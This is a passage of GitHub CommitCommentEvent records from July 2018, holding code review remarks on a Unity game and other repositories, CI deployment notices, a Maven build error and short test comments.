{"id":"7918213868","type":"CommitCommentEvent","actor":{"login":"alexfelipe"},"repo":{"name":"bugan/FugaEspacial_UnityMobile"},"payload":{"comment":{"id":29594731,"position":41,"line":41,"path":"Assets/Scritpt/Gameplay/Gerador.cs","commit_id":"a96069b98bddf1a1c4fe6dace3a01559530575d4","created_at":"2018-07-04T12:34:49Z","updated_at":"2018-07-04T12:34:49Z","author_association":"NONE","body":"Extraia a cor para uma constante"}},"created_at":"2018-07-04T12:34:49Z"}
{"id":"7918217441","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29594736,"position":null,"line":null,"path":null,"commit_id":"732090f331e4882a5ab94802e599362f94afd450","created_at":"2018-07-04T12:35:30Z","updated_at":"2018-07-04T12:35:30Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-04T12:35:30Z"}
{"id":"7918223859","type":"CommitCommentEvent","actor":{"login":"MohannadBakkar"},"repo":{"name":"rbkEsraaRamahi/pairing_system"},"payload":{"comment":{"id":29594743,"position":5,"line":7,"path":"package.json","commit_id":"768f81e0b77a259cc5a20a56591c801597bd32dc","created_at":"2018-07-04T12:36:47Z","updated_at":"2018-07-04T12:36:47Z","author_association":"NONE","body":"test"}},"created_at":"2018-07-04T12:36:47Z"}
{"id":"7918225952","type":"CommitCommentEvent","actor":{"login":"alexfelipe"},"repo":{"name":"bugan/FugaEspacial_UnityMobile"},"payload":{"comment":{"id":29594744,"position":21,"line":21,"path":"Assets/Scritpt/Gameplay/MovimentoOscilatorio.cs","commit_id":"a96069b98bddf1a1c4fe6dace3a01559530575d4","created_at":"2018-07-04T12:37:12Z","updated_at":"2018-07-04T12:37:12Z","author_association":"NONE","body":"Da pra deixar como constante esses atributos?"}},"created_at":"2018-07-04T12:37:12Z"}
{"id":"7918227287","type":"CommitCommentEvent","actor":{"login":"qlikossbuild"},"repo":{"name":"qlik-oss/core-website"},"payload":{"comment":{"id":29594746,"position":null,"line":null,"path":null,"commit_id":"6176f01d63437dc6cbf813c8e836d0f1f836eeeb","created_at":"2018-07-04T12:37:26Z","updated_at":"2018-07-04T12:37:26Z","author_association":"CONTRIBUTOR","body":"A generated website with your changes can be accessed here: https://doc-review.qlikcore.com/bhq-data-loading-page-title. The website will automatically be updated if more commits are pushed to the branch."}},"created_at":"2018-07-04T12:37:26Z"}
{"id":"7918228414","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29594750,"position":null,"line":null,"path":null,"commit_id":"effbf0cb0bd289925da79124c5b8e778a92736bc","created_at":"2018-07-04T12:37:39Z","updated_at":"2018-07-04T12:37:39Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-04T12:37:39Z"}
{"id":"7918230816","type":"CommitCommentEvent","actor":{"login":"vibze"},"repo":{"name":"alex-ten/HFSP"},"payload":{"comment":{"id":29594754,"position":null,"line":null,"path":null,"commit_id":"3ac5c62a887aace30b8695b8af4d515ef6c9e950","created_at":"2018-07-04T12:38:10Z","updated_at":"2018-07-04T12:38:10Z","author_association":"COLLABORATOR","body":"Нахуярил"}},"created_at":"2018-07-04T12:38:10Z"}
{"id":"7918232967","type":"CommitCommentEvent","actor":{"login":"alexfelipe"},"repo":{"name":"bugan/FugaEspacial_UnityMobile"},"payload":{"comment":{"id":29594769,"position":32,"line":32,"path":"Assets/Scritpt/Gameplay/MovimentoOscilatorio.cs","commit_id":"a96069b98bddf1a1c4fe6dace3a01559530575d4","created_at":"2018-07-04T12:38:36Z","updated_at":"2018-07-04T12:38:36Z","author_association":"NONE","body":"Da pra extrair esse bloco em um método que calcula o período"}},"created_at":"2018-07-04T12:38:36Z"}
{"id":"7918233216","type":"CommitCommentEvent","actor":{"login":"jobs1127github"},"repo":{"name":"jobs1127github/gitTest"},"payload":{"comment":{"id":29594770,"position":5,"line":17,"path":"架构师笔记.java","commit_id":"763834e2d0d0f607d6f4cb3133509f3a1344422c","created_at":"2018-07-04T12:38:40Z","updated_at":"2018-07-04T12:38:40Z","author_association":"OWNER","body":"sss"}},"created_at":"2018-07-04T12:38:40Z"}
{"id":"7918235640","type":"CommitCommentEvent","actor":{"login":"matthiaskoenig"},"repo":{"name":"shalinshah1993/SBSCL"},"payload":{"comment":{"id":29594777,"position":null,"line":null,"path":null,"commit_id":"2411bae03b74f522bccedc9332fe818008a6f47f","created_at":"2018-07-04T12:39:10Z","updated_at":"2018-07-04T12:39:10Z","author_association":"COLLABORATOR","body":"I can not compile the latest commit. \r\n```\r\nmvn clean install\r\n```\r\ngives\r\n```\r\n[INFO] -------------------------------------------------------------\r\n[ERROR] COMPILATION ERROR : \r\n[INFO] -------------------------------------------------------------\r\n[ERROR] /home/mkoenig/git/sbscl-shalin/src/main/java/org/simulator/examples/SEDMLv2Example.java:[49,82] unreported exception org.semanticweb.owlapi.model.OWLOntologyCreationException; must be caught or declared to be thrown\r\n[INFO] 1 error\r\n[INFO] -------------------------------------------------------------\r\n[INFO] ------------------------------------------------------------------------\r\n[INFO] BUILD FAILURE\r\n[INFO] ------------------------------------------------------------------------\r\n[INFO] Total time: 2.183 s\r\n[INFO] Finished at: 2018-07-04T14:37:38+02:00\r\n[INFO] Final Memory: 21M/417M\r\n[INFO] ------------------------------------------------------------------------\r\n[ERROR] Failed to execute goal org.apache.maven.plugins:maven-compiler-plugin:3.3:compile (default-compile) on project sbscl: Compilation failure\r\n[ERROR] /home/mkoenig/git/sbscl-shalin/src/main/java/org/simulator/examples/SEDMLv2Example.java:[49,82] unreported exception org.semanticweb.owlapi.model.OWLOntologyCreationException; must be caught or declared to be thrown\r\n[ERROR] -> [Help 1]\r\n[ERROR] \r\n[ERROR] To see the full stack trace of the errors, re-run Maven with the -e switch.\r\n[ERROR] Re-run Maven using the -X switch to enable full debug logging.\r\n[ERROR] \r\n[ERROR] For more information about the errors and possible solutions, please read the following articles:\r\n[ERROR] [Help 1] http://cwiki.apache.org/confluence/display/MAVEN/MojoFailureException\r\n```\r\n"}},"created_at":"2018-07-04T12:39:10Z"}
{"id":"7918237592","type":"CommitCommentEvent","actor":{"login":"MohannadBakkar"},"repo":{"name":"rbkEsraaRamahi/pairing_system"},"payload":{"comment":{"id":29594782,"position":3,"line":6,"path":"package.json","commit_id":"768f81e0b77a259cc5a20a56591c801597bd32dc","created_at":"2018-07-04T12:39:33Z","updated_at":"2018-07-04T12:39:33Z","author_association":"NONE","body":"testing"}},"created_at":"2018-07-04T12:39:33Z"}
{"id":"7918241299","type":"CommitCommentEvent","actor":{"login":"hugovk"},"repo":{"name":"python-pillow/Pillow"},"payload":{"comment":{"id":29594787,"position":null,"line":null,"path":null,"commit_id":"36be37c5c56ae042b3a35e3abf3d59061c0e1162","created_at":"2018-07-04T12:40:19Z","updated_at":"2018-07-04T12:40:19Z","author_association":"MEMBER","body":"@Menollo please will you create an issue? \r\n\r\nhttps://github.com/python-pillow/Pillow/issues/new"}},"created_at":"2018-07-04T12:40:19Z"}
{"id":"7918244530","type":"CommitCommentEvent","actor":{"login":"esposem"},"repo":{"name":"esposem/qemu"},"payload":{"comment":{"id":29594796,"position":6,"line":770,"path":"tests/Makefile.include","commit_id":"cd4581cb9c33d05457b255d7eaf73df2c823aede","created_at":"2018-07-04T12:40:58Z","updated_at":"2018-07-04T12:40:58Z","author_association":"OWNER","body":"why `tests/test/qgraph.c`? You mean `tests/qgraph/test-qgraph` -> `tests/test/qgraph.c`? \r\nBut the `/test/` folder does not really convince me"}},"created_at":"2018-07-04T12:40:58Z"}
{"id":"7918250306","type":"CommitCommentEvent","actor":{"login":"YuZiHanorz"},"repo":{"name":"YuZiHanorz/MIPS-Simulator"},"payload":{"comment":{"id":29594815,"position":null,"line":null,"path":null,"commit_id":"248badf1598dec1e141e5ac3acb87fbb84b27d7d","created_at":"2018-07-04T12:42:10Z","updated_at":"2018-07-04T12:42:10Z","author_association":"OWNER","body":"simplify the instructions"}},"created_at":"2018-07-04T12:42:10Z"}
{"id":"7918255993","type":"CommitCommentEvent","actor":{"login":"shalinshah1993"},"repo":{"name":"shalinshah1993/SBSCL"},"payload":{"comment":{"id":29594835,"position":null,"line":null,"path":null,"commit_id":"2411bae03b74f522bccedc9332fe818008a6f47f","created_at":"2018-07-04T12:43:15Z","updated_at":"2018-07-04T12:43:15Z","author_association":"OWNER","body":"Oh my bad, I think I missed adding changes to SEDMLv2Example file. Give me a few minutes, I will add them as well. Just need to add a throws declaration or a try/catch."}},"created_at":"2018-07-04T12:43:15Z"}
{"id":"7918256549","type":"CommitCommentEvent","actor":{"login":"sepidetari"},"repo":{"name":"dice-group/sask"},"payload":{"comment":{"id":29594836,"position":16,"line":225,"path":"database-ms/src/main/java/org/dice_research/sask/database_ms/DbController.java","commit_id":"f90871aaaebccea1f28a6a338c634d06ae2800eb","created_at":"2018-07-04T12:43:21Z","updated_at":"2018-07-04T12:43:21Z","author_association":"COLLABORATOR","body":"@prasanthhs As we have discussed that query did not work so I have modified according your need and was confirmed by you.  "}},"created_at":"2018-07-04T12:43:21Z"}
{"id":"7918259572","type":"CommitCommentEvent","actor":{"login":"alexfelipe"},"repo":{"name":"bugan/FugaEspacial_UnityMobile"},"payload":{"comment":{"id":29594844,"position":17,"line":17,"path":"Assets/Scritpt/Gameplay/Pontuacao.cs","commit_id":"a96069b98bddf1a1c4fe6dace3a01559530575d4","created_at":"2018-07-04T12:43:58Z","updated_at":"2018-07-04T12:43:58Z","author_association":"NONE","body":"Extrai para um método, pode ser algo como, naoInicializado"}},"created_at":"2018-07-04T12:43:58Z"}
{"id":"7918260408","type":"CommitCommentEvent","actor":{"login":"maxnet"},"repo":{"name":"raspberrypi-ui/piwiz"},"payload":{"comment":{"id":29594846,"position":null,"line":null,"path":null,"commit_id":"7063e8eac1ab5060d7f402d94494f4121e040a34","created_at":"2018-07-04T12:44:09Z","updated_at":"2018-07-04T12:44:09Z","author_association":"NONE","body":"Eh, no.\r\nYou are the only one incorrectly assuming **country codes** match **keyboard layout codes**.\r\nDebian's installer does default to \"US\" layout if one selects Dutch as language:\r\n\r\n![debian9-1](https://user-images.githubusercontent.com/1123701/42277711-9111ef0c-7f98-11e8-89f5-702793971af3.png)\r\n![debian9-2](https://user-images.githubusercontent.com/1123701/42277716-9475c7fe-7f98-11e8-90bb-5a088e4b99e3.png)\r\n\r\nSame with Ubuntu, although that one uses \"US international\" by default:\r\n\r\n![ubuntu-1](https://user-images.githubusercontent.com/1123701/42277722-9b35f7a8-7f98-11e8-8412-8a9998628f37.png)\r\n![ubuntu-2](https://user-images.githubusercontent.com/1123701/42277734-a0f1d07c-7f98-11e8-80bf-957de5c093bd.png)\r\n"}},"created_at":"2018-07-04T12:44:09Z"}
{"id":"7918263335","type":"CommitCommentEvent","actor":{"login":"jorik86"},"repo":{"name":"jorik86/redesigned-octo-palm-tree"},"payload":{"comment":{"id":29594853,"position":null,"line":null,"path":null,"commit_id":"2b4038f171029e1360ab722da7cd968730003aff","created_at":"2018-07-04T12:44:42Z","updated_at":"2018-07-04T12:44:42Z","author_association":"OWNER","body":"2b4038f"}},"created_at":"2018-07-04T12:44:42Z"}
{"id":"7918264036","type":"CommitCommentEvent","actor":{"login":"alexfelipe"},"repo":{"name":"bugan/FugaEspacial_UnityMobile"},"payload":{"comment":{"id":29594854,"position":11,"line":11,"path":"Assets/Scritpt/Gameplay/Pontuavel.cs","commit_id":"a96069b98bddf1a1c4fe6dace3a01559530575d4","created_at":"2018-07-04T12:44:50Z","updated_at":"2018-07-04T12:44:50Z","author_association":"NONE","body":"Extrair string para constante e o que está sendo avaliado para um método"}},"created_at":"2018-07-04T12:44:50Z"}
{"id":"7918266106","type":"CommitCommentEvent","actor":{"login":"esl4m"},"repo":{"name":"raccoongang/edx-platform"},"payload":{"comment":{"id":29594859,"position":25,"line":25,"path":"common/djangoapps/third_party_auth/urls.py","commit_id":"6f0bdaeda6716356a3baec9cc8a757a991a67bfb","created_at":"2018-07-04T12:45:14Z","updated_at":"2018-07-04T12:45:14Z","author_association":"NONE","body":"@Marx86 could you please confirm why repeating the url ?\r\nit's already in line 21 "}},"created_at":"2018-07-04T12:45:14Z"}
{"id":"7918266112","type":"CommitCommentEvent","actor":{"login":"taoubi"},"repo":{"name":"AospExtended-Devices/device_xiaomi_capricorn"},"payload":{"comment":{"id":29594860,"position":null,"line":null,"path":null,"commit_id":"2aa739ff15ad2377229be277f619b238d61b6d3f","created_at":"2018-07-04T12:45:15Z","updated_at":"2018-07-04T12:45:15Z","author_association":"NONE","body":"<bool name=\"config_displayBlanksAfterDoze\">true</bool>"}},"created_at":"2018-07-04T12:45:15Z"}
{"id":"7918267239","type":"CommitCommentEvent","actor":{"login":"niazim3"},"repo":{"name":"JacquesCarette/Drasil"},"payload":{"comment":{"id":29594866,"position":13,"line":31,"path":"code/Language/Drasil/Chunk/Eq.hs","commit_id":"b032040f259db486b4b1e988784879bb81cb9d00","created_at":"2018-07-04T12:45:28Z","updated_at":"2018-07-04T12:45:28Z","author_association":"COLLABORATOR","body":"Since no data definition currently needs an additional notes section to hold information, do you recommend removing the `_notes` field from `QDefinition` until it is needed (i.e. no longer make it an instance of `HasAdditionalNotes`)?\r\n\r\nThe reason why this was implemented was because `Notes` was added as a \"standard field\" after `Description`:\r\nhttps://github.com/JacquesCarette/Drasil/blob/2683bb0765b62d8e6a67e9e1a219cf372ce98e8c/code/Example/Drasil/GlassBR/Body.hs#L151-L152, which is a list of fields used for `IMs`, `TMs`, and `DDs`:\r\nhttps://github.com/JacquesCarette/Drasil/blob/2683bb0765b62d8e6a67e9e1a219cf372ce98e8c/code/Example/Drasil/GlassBR/Body.hs#L124-L127\r\n\r\nAdding it now also allows for easy updates to new constructors to implement the `Notes` in the future as well. \r\n\r\nHowever, if it is not ideal to have redundant code like this in this file, I can remove the `_notes` field and update the examples' definitions for `DDs` to not use the standard list of fields."}},"created_at":"2018-07-04T12:45:28Z"}
{"id":"7918267420","type":"CommitCommentEvent","actor":{"login":"alexfelipe"},"repo":{"name":"bugan/FugaEspacial_UnityMobile"},"payload":{"comment":{"id":29594867,"position":18,"line":18,"path":"Assets/Scritpt/Gameplay/Pool.cs","commit_id":"a96069b98bddf1a1c4fe6dace3a01559530575d4","created_at":"2018-07-04T12:45:30Z","updated_at":"2018-07-04T12:45:30Z","author_association":"NONE","body":"tudo indica que lista pode ser constante"}},"created_at":"2018-07-04T12:45:30Z"}
{"id":"7918270331","type":"CommitCommentEvent","actor":{"login":"alexfelipe"},"repo":{"name":"bugan/FugaEspacial_UnityMobile"},"payload":{"comment":{"id":29594874,"position":23,"line":23,"path":"Assets/Scritpt/Gameplay/Pool.cs","commit_id":"a96069b98bddf1a1c4fe6dace3a01559530575d4","created_at":"2018-07-04T12:46:08Z","updated_at":"2018-07-04T12:46:08Z","author_association":"NONE","body":"Extraia para um método que define o que está sendo feito nesse bloco de código"}},"created_at":"2018-07-04T12:46:08Z"}
{"id":"7918272709","type":"CommitCommentEvent","actor":{"login":"alexfelipe"},"repo":{"name":"bugan/FugaEspacial_UnityMobile"},"payload":{"comment":{"id":29594879,"position":8,"line":8,"path":"Assets/Scritpt/Gameplay/Pool.cs","commit_id":"a96069b98bddf1a1c4fe6dace3a01559530575d4","created_at":"2018-07-04T12:46:33Z","updated_at":"2018-07-04T12:46:33Z","author_association":"NONE","body":"O que indica esse atributo?"}},"created_at":"2018-07-04T12:46:33Z"}
{"id":"7918276386","type":"CommitCommentEvent","actor":{"login":"spl237"},"repo":{"name":"raspberrypi-ui/piwiz"},"payload":{"comment":{"id":29594880,"position":null,"line":null,"path":null,"commit_id":"7063e8eac1ab5060d7f402d94494f4121e040a34","created_at":"2018-07-04T12:47:15Z","updated_at":"2018-07-04T12:47:15Z","author_association":"CONTRIBUTOR","body":"In that case, do you know where Debian stores the table of mappings between country / language and default keyboard? Or is it (as I suspect) just offering American English as the default for every country / language - because I haven't yet found any config files in the system which do provide a mapping."}},"created_at":"2018-07-04T12:47:15Z"}
{"id":"7918276438","type":"CommitCommentEvent","actor":{"login":"geek1116"},"repo":{"name":"geek1116/Hello-World"},"payload":{"comment":{"id":29594881,"position":1,"line":1,"path":"hello_world.php","commit_id":"3859533cb2b67270c5aaa7fd84ab3f5df37cfa72","created_at":"2018-07-04T12:47:15Z","updated_at":"2018-07-04T12:47:15Z","author_association":"OWNER","body":"fdh"}},"created_at":"2018-07-04T12:47:15Z"}
{"id":"7918277361","type":"CommitCommentEvent","actor":{"login":"shoheis"},"repo":{"name":"c-osanai/techdrive"},"payload":{"comment":{"id":29594883,"position":17,"line":17,"path":"019/1901.html","commit_id":"e40f202fc25143e95751b4a3b2404f203a042144","created_at":"2018-07-04T12:47:26Z","updated_at":"2018-07-04T12:47:26Z","author_association":"COLLABORATOR","body":"@c-osanai \r\nそうですね、each(forではやっていないのですが、forでもできるかと思います。)を使って挑戦したいところではありますね！\r\nbox01 → box02 というように 数字がひとつずつ増えているのは利用できるかと思いますよ！"}},"created_at":"2018-07-04T12:47:26Z"}
{"id":"7918277373","type":"CommitCommentEvent","actor":{"login":"shalinshah1993"},"repo":{"name":"shalinshah1993/SBSCL"},"payload":{"comment":{"id":29594884,"position":null,"line":null,"path":null,"commit_id":"2411bae03b74f522bccedc9332fe818008a6f47f","created_at":"2018-07-04T12:47:26Z","updated_at":"2018-07-04T12:47:26Z","author_association":"OWNER","body":"Pushed commit! "}},"created_at":"2018-07-04T12:47:26Z"}
{"id":"7918278437","type":"CommitCommentEvent","actor":{"login":"olegmingaleev"},"repo":{"name":"Ant-VAV/tinkoff"},"payload":{"comment":{"id":29594888,"position":20,"line":18,"path":"Readme.md","commit_id":"a22965f7708583be45d22b9ca2d80919ed330560","created_at":"2018-07-04T12:47:39Z","updated_at":"2018-07-04T12:47:39Z","author_association":"NONE","body":"Грамматическая ошибка\r\n\r\n> ...элементов ищются по ...\r\n\r\nищутся"}},"created_at":"2018-07-04T12:47:39Z"}
{"id":"7918283677","type":"CommitCommentEvent","actor":{"login":"olegmingaleev"},"repo":{"name":"Ant-VAV/tinkoff"},"payload":{"comment":{"id":29594894,"position":23,"line":21,"path":"Readme.md","commit_id":"a22965f7708583be45d22b9ca2d80919ed330560","created_at":"2018-07-04T12:48:41Z","updated_at":"2018-07-04T12:48:41Z","author_association":"NONE","body":"Грамматическая ошибка \"однозначаного\""}},"created_at":"2018-07-04T12:48:41Z"}
{"id":"7918284970","type":"CommitCommentEvent","actor":{"login":"alexfelipe"},"repo":{"name":"bugan/FugaEspacial_UnityMobile"},"payload":{"comment":{"id":29594898,"position":32,"line":32,"path":"Assets/Scritpt/Gameplay/Pool.cs","commit_id":"a96069b98bddf1a1c4fe6dace3a01559530575d4","created_at":"2018-07-04T12:48:56Z","updated_at":"2018-07-04T12:48:56Z","author_association":"NONE","body":"Da pra extrair para método menores"}},"created_at":"2018-07-04T12:48:56Z"}
{"id":"7918285599","type":"CommitCommentEvent","actor":{"login":"ddennedy"},"repo":{"name":"mltframework/mlt"},"payload":{"comment":{"id":29594900,"position":null,"line":null,"path":null,"commit_id":"7bf5da86d4f2f8f83f45b9809fb061cbfdd97906","created_at":"2018-07-04T12:49:04Z","updated_at":"2018-07-04T12:49:04Z","author_association":"MEMBER","body":"@oberon-manjaro Did you see the segfaults with git master HEAD or v6.10.0? There were some critical bug fixes in the qimage producer since making this change. The need to initialize QApplication on the main thread has typically not been necessary on Linux especially for MLT's most common use cases of reading an image file or rendering text. I am on a vacation until July 10, and then I will test with Flowblade myself.\r\n"}},"created_at":"2018-07-04T12:49:04Z"}
{"id":"7918286602","type":"CommitCommentEvent","actor":{"login":"OrkhanAlikhanov"},"repo":{"name":"CosmicMind/Material"},"payload":{"comment":{"id":29594902,"position":29,"line":420,"path":"Sources/iOS/TabsController.swift","commit_id":"a741f921c4275d6799f67b16e07546490cddc594","created_at":"2018-07-04T12:49:16Z","updated_at":"2018-07-04T12:49:16Z","author_association":"MEMBER","body":"@danieldahan Since we don't have this line anymore, tabBar selection is not changed when active viewController is changed through swipe gesture."}},"created_at":"2018-07-04T12:49:16Z"}
{"id":"7918286871","type":"CommitCommentEvent","actor":{"login":"alexfelipe"},"repo":{"name":"bugan/FugaEspacial_UnityMobile"},"payload":{"comment":{"id":29594904,"position":38,"line":38,"path":"Assets/Scritpt/Gameplay/Pool.cs","commit_id":"a96069b98bddf1a1c4fe6dace3a01559530575d4","created_at":"2018-07-04T12:49:19Z","updated_at":"2018-07-04T12:49:19Z","author_association":"NONE","body":"Extrair o que está sendo avaliado"}},"created_at":"2018-07-04T12:49:19Z"}
{"id":"7918287138","type":"CommitCommentEvent","actor":{"login":"inigoviti"},"repo":{"name":"inigoviti/sample-cloud-native-toolchain-tutorial-20180622132958919"},"payload":{"comment":{"id":29594906,"position":null,"line":null,"path":null,"commit_id":"1e7347907dbf66e6a93a36a58de9036ac20bacb6","created_at":"2018-07-04T12:49:22Z","updated_at":"2018-07-04T12:49:22Z","author_association":"OWNER","body":"IBM Cloud [toolchain](https://console.ng.bluemix.net/devops/toolchains/2e35db2f-dd7a-4148-99c1-334f12f28835?env_id=ibm%3Ayp%3Aus-south \"cloud-native-toolchain-tutorial-20180622132958919\"): [Delivery Pipeline](https://console.ng.bluemix.net/devops/pipelines/4390e7fa-5585-44ae-9197-c3e382483463?env_id=ibm%3Ayp%3Aus-south \"sample-cloud-native-toolchain-tutorial-20180622132958919\") deployed [sample-cloud-native-toolchain-tutorial-20180622132958919](https://github.com/inigoviti/sample-cloud-native-toolchain-tutorial-20180622132958919/releases/tag/deploy-ibm-yp-us-south-inigo.viti-ie.ibm.com-test-20180704-124921 \"deploy-ibm-yp-us-south-inigo.viti-ie.ibm.com-test-20180704-124921\") to [test](https://console.bluemix.net/apps/9f94d602-b0bd-4aa1-8b83-d4faacb57b97?env_id=ibm:yp:us-south \"ibm:yp:us-south:inigo.viti@ie.ibm.com:test\"), including this commit"}},"created_at":"2018-07-04T12:49:22Z"}
{"id":"7918293198","type":"CommitCommentEvent","actor":{"login":"cosmicdan"},"repo":{"name":"aosp-tissot/frameworks_base"},"payload":{"comment":{"id":29594924,"position":null,"line":null,"path":null,"commit_id":"6182caa55d808c642d6e69aa516c808748f9bc9a","created_at":"2018-07-04T12:50:34Z","updated_at":"2018-07-04T12:50:34Z","author_association":"NONE","body":"Suggestion (example):\r\n\r\n```\r\nif (SystemProperties.get(\"persist.signal.ignorersrp\", \"false\").equals(\"true\")) {\r\n    /* Ignore RSSNR for now */\r\n    if(rsrpIconLevel != -1) return rsrpIconLevel;\r\n}\r\n```"}},"created_at":"2018-07-04T12:50:34Z"}
{"id":"7918294449","type":"CommitCommentEvent","actor":{"login":"mrbelowski"},"repo":{"name":"mrbelowski/CrewChiefV4"},"payload":{"comment":{"id":29594927,"position":31,"line":515,"path":"CrewChiefV4/SpeechRecogniser.cs","commit_id":"135286645dd90d4c2f18b4d570146cdc70124537","created_at":"2018-07-04T12:50:49Z","updated_at":"2018-07-04T12:50:49Z","author_association":"OWNER","body":"The 'en' string here should probably come from the audio player's language attribute (which comes from the auto update XML). Its possible that someone may translate the recognition phrases and set a different language"}},"created_at":"2018-07-04T12:50:49Z"}
{"id":"7918295337","type":"CommitCommentEvent","actor":{"login":"alexfelipe"},"repo":{"name":"bugan/FugaEspacial_UnityMobile"},"payload":{"comment":{"id":29594931,"position":38,"line":38,"path":"Assets/Scritpt/Gameplay/Pool.cs","commit_id":"a96069b98bddf1a1c4fe6dace3a01559530575d4","created_at":"2018-07-04T12:51:00Z","updated_at":"2018-07-04T12:51:00Z","author_association":"NONE","body":"Se for muito comum e subentendida essa avaliação no mundo c# não precisa extrair"}},"created_at":"2018-07-04T12:51:00Z"}
{"id":"7918296019","type":"CommitCommentEvent","actor":{"login":"godo13405"},"repo":{"name":"godo13405/dragon-spellbook"},"payload":{"comment":{"id":29594937,"position":null,"line":null,"path":null,"commit_id":"e64d1f036921fa131f53920eaa391c4012318a62","created_at":"2018-07-04T12:51:10Z","updated_at":"2018-07-04T12:51:10Z","author_association":"OWNER","body":"IBM Cloud [toolchain](https://console.bluemix.net/devops/toolchains/48c4c854-767b-47f7-b2ec-7f79e14cf35d?env_id=ibm%3Ayp%3Aeu-gb \"dragon-book\"): [Delivery Pipeline](https://console.bluemix.net/devops/pipelines/7ddab936-a781-49fa-99fc-742d790aea96?env_id=ibm%3Ayp%3Aeu-gb \"dragon-book\") deployed [dragon-spellbook](https://github.com/godo13405/dragon-spellbook/releases/tag/deploy-ibm-yp-eu-gb-UXCalibur-prod-20180704-125108 \"deploy-ibm-yp-eu-gb-UXCalibur-prod-20180704-125108\") to [prod](https://console.bluemix.net/apps/aaffb021-5482-4ff5-bc14-26c90db6686c?env_id=ibm:yp:eu-gb \"ibm:yp:eu-gb:UXCalibur:prod\"), including this commit"}},"created_at":"2018-07-04T12:51:10Z"}
{"id":"7918299391","type":"CommitCommentEvent","actor":{"login":"BongOmoon"},"repo":{"name":"HwangYumin/dbals"},"payload":{"comment":{"id":29594965,"position":null,"line":null,"path":null,"commit_id":"a0cd02bff3c45a45c02ff625b145f3a59c06f33a","created_at":"2018-07-04T12:51:49Z","updated_at":"2018-07-04T12:51:49Z","author_association":"NONE","body":"ㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋ왕머성 ㄷㄷ"}},"created_at":"2018-07-04T12:51:49Z"}
{"id":"7918300400","type":"CommitCommentEvent","actor":{"login":"alexfelipe"},"repo":{"name":"bugan/FugaEspacial_UnityMobile"},"payload":{"comment":{"id":29594967,"position":53,"line":53,"path":"Assets/Scritpt/Gameplay/Pool.cs","commit_id":"a96069b98bddf1a1c4fe6dace3a01559530575d4","created_at":"2018-07-04T12:52:03Z","updated_at":"2018-07-04T12:52:03Z","author_association":"NONE","body":"If grandão, da pra extrair para métodos menores"}},"created_at":"2018-07-04T12:52:03Z"}
{"id":"7918300703","type":"CommitCommentEvent","actor":{"login":"psanders"},"repo":{"name":"fonoster/sipio"},"payload":{"comment":{"id":29594968,"position":null,"line":null,"path":null,"commit_id":"ea16a561181243b9d52eadae54cca829b7e48b0a","created_at":"2018-07-04T12:52:07Z","updated_at":"2018-07-04T12:52:07Z","author_association":"MEMBER","body":"Re-added those files(and the gradle folder with the wrapper)"}},"created_at":"2018-07-04T12:52:07Z"}
{"id":"7918301714","type":"CommitCommentEvent","actor":{"login":"inigoviti"},"repo":{"name":"inigoviti/sample-cloud-native-toolchain-tutorial-20180622132958919"},"payload":{"comment":{"id":29594969,"position":null,"line":null,"path":null,"commit_id":"1e7347907dbf66e6a93a36a58de9036ac20bacb6","created_at":"2018-07-04T12:52:18Z","updated_at":"2018-07-04T12:52:18Z","author_association":"OWNER","body":"IBM Cloud [toolchain](https://console.ng.bluemix.net/devops/toolchains/2e35db2f-dd7a-4148-99c1-334f12f28835?env_id=ibm%3Ayp%3Aus-south \"cloud-native-toolchain-tutorial-20180622132958919\"): [Delivery Pipeline](https://console.ng.bluemix.net/devops/pipelines/4390e7fa-5585-44ae-9197-c3e382483463?env_id=ibm%3Ayp%3Aus-south \"sample-cloud-native-toolchain-tutorial-20180622132958919\") deployed [sample-cloud-native-toolchain-tutorial-20180622132958919](https://github.com/inigoviti/sample-cloud-native-toolchain-tutorial-20180622132958919/releases/tag/deploy-ibm-yp-us-south-inigo.viti-ie.ibm.com-prod-20180704-125217 \"deploy-ibm-yp-us-south-inigo.viti-ie.ibm.com-prod-20180704-125217\") to [prod](https://console.bluemix.net/apps/716fdefe-8b8a-42a6-9281-ed27a460dd97?env_id=ibm:yp:us-south \"ibm:yp:us-south:inigo.viti@ie.ibm.com:prod\"), including this 